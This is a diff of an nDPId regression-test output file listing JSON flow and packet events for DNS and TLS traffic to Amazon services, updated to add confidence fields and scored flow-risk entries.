+00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976186879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.23.94"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186884,"flow_last_seen":1490976186884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976186884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1490976186884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976186884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8flZAAEAGlzCsECrYNu8XXq9wAbvy\/\/kGAAAAAKAC\/\/\/9UAAAAgQFtAQCCAoA9odQAAAAAAEDAwg="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2703,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1490976187052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976187052,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwqiJAAOcGxG827xderBAq2AG7r3A+ML0a8v\/5B3ASH\/6mVwAAAgQFtAEDAwY="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2705,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1490976187055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976187055,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofldAAEAGl0OsECrYNu8XXq9wAbvy\/\/kHPjC9G1AQAVfwyAAA"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2706,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186884,"flow_last_seen":1490976187057,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976187057,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2709,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186884,"flow_last_seen":1490976187167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1687,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1490976187167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01262{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2713,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976186884,"flow_last_seen":1490976187172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":418,"midstream":0,"ts_msec":1490976187172,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}}
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2706,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186884,"flow_last_seen":1490976187057,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976187057,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2709,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186884,"flow_last_seen":1490976187167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1687,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1490976187167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2713,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976186884,"flow_last_seen":1490976187172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":418,"midstream":0,"ts_msec":1490976187172,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1490976187242,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1490976187242,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WmNAAEARM1KsECrYrBAqAeoEADUAKipZJj0BAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1490976187508,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"ts_msec":1490976187508,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl6w9AAEARon6sECoBrBAq2AA16gQAUSKUJj2BgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAADoACwhwaXRhbmd1acASwC4AAQABAAAAOgAENu8csg=="}
-00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976187508,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}}
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976187508,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187511,"flow_last_seen":1490976187511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976187511,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1490976187511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976187511,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8IbxAAEAG7nasECrYNu8cspdlAbtMyaYzAAAAAKAC\/\/8I0wAAAgQFtAQCCAoA9oePAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2739,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1490976187571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976187571,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3K9AAOcGjI427xyyrBAq2AG7l2UCDLyqTMmmNHASH\/7urAAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2742,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1490976187575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976187575,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoIb1AAEAG7omsECrYNu8cspdlAbtMyaY0Agy8q1AQAVc5HgAA"}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2743,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976187511,"flow_last_seen":1490976187577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976187577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2747,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976187511,"flow_last_seen":1490976187704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3439,"flow_avg_l4_payload_len":491,"midstream":0,"ts_msec":1490976187704,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2743,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976187511,"flow_last_seen":1490976187577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976187577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01705{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2747,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976187511,"flow_last_seen":1490976187704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3439,"flow_avg_l4_payload_len":491,"midstream":0,"ts_msec":1490976187704,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1490976195484,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976195484,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WmRAAEARM1OsECrYrBAqATpWADUAKI0W4msBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1490976195524,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1490976195524,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC96\/xAAEARoTmsECoBrBAq2AA1OlYAqVJ+4muBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAAW8AAoDd3d3A2NkbsAQwCwABQABAAAAWAAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAABoABDRV0Y\/AQgABAAEAAAAaAAQ0VdF6wEIAAQABAAAAGgAENFXR2MBCAAEAAQAAABoABDRV0cU="}
-00759{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976195524,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.143"}}
+00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976195524,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.143"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195529,"flow_last_seen":1490976195529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976195529,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
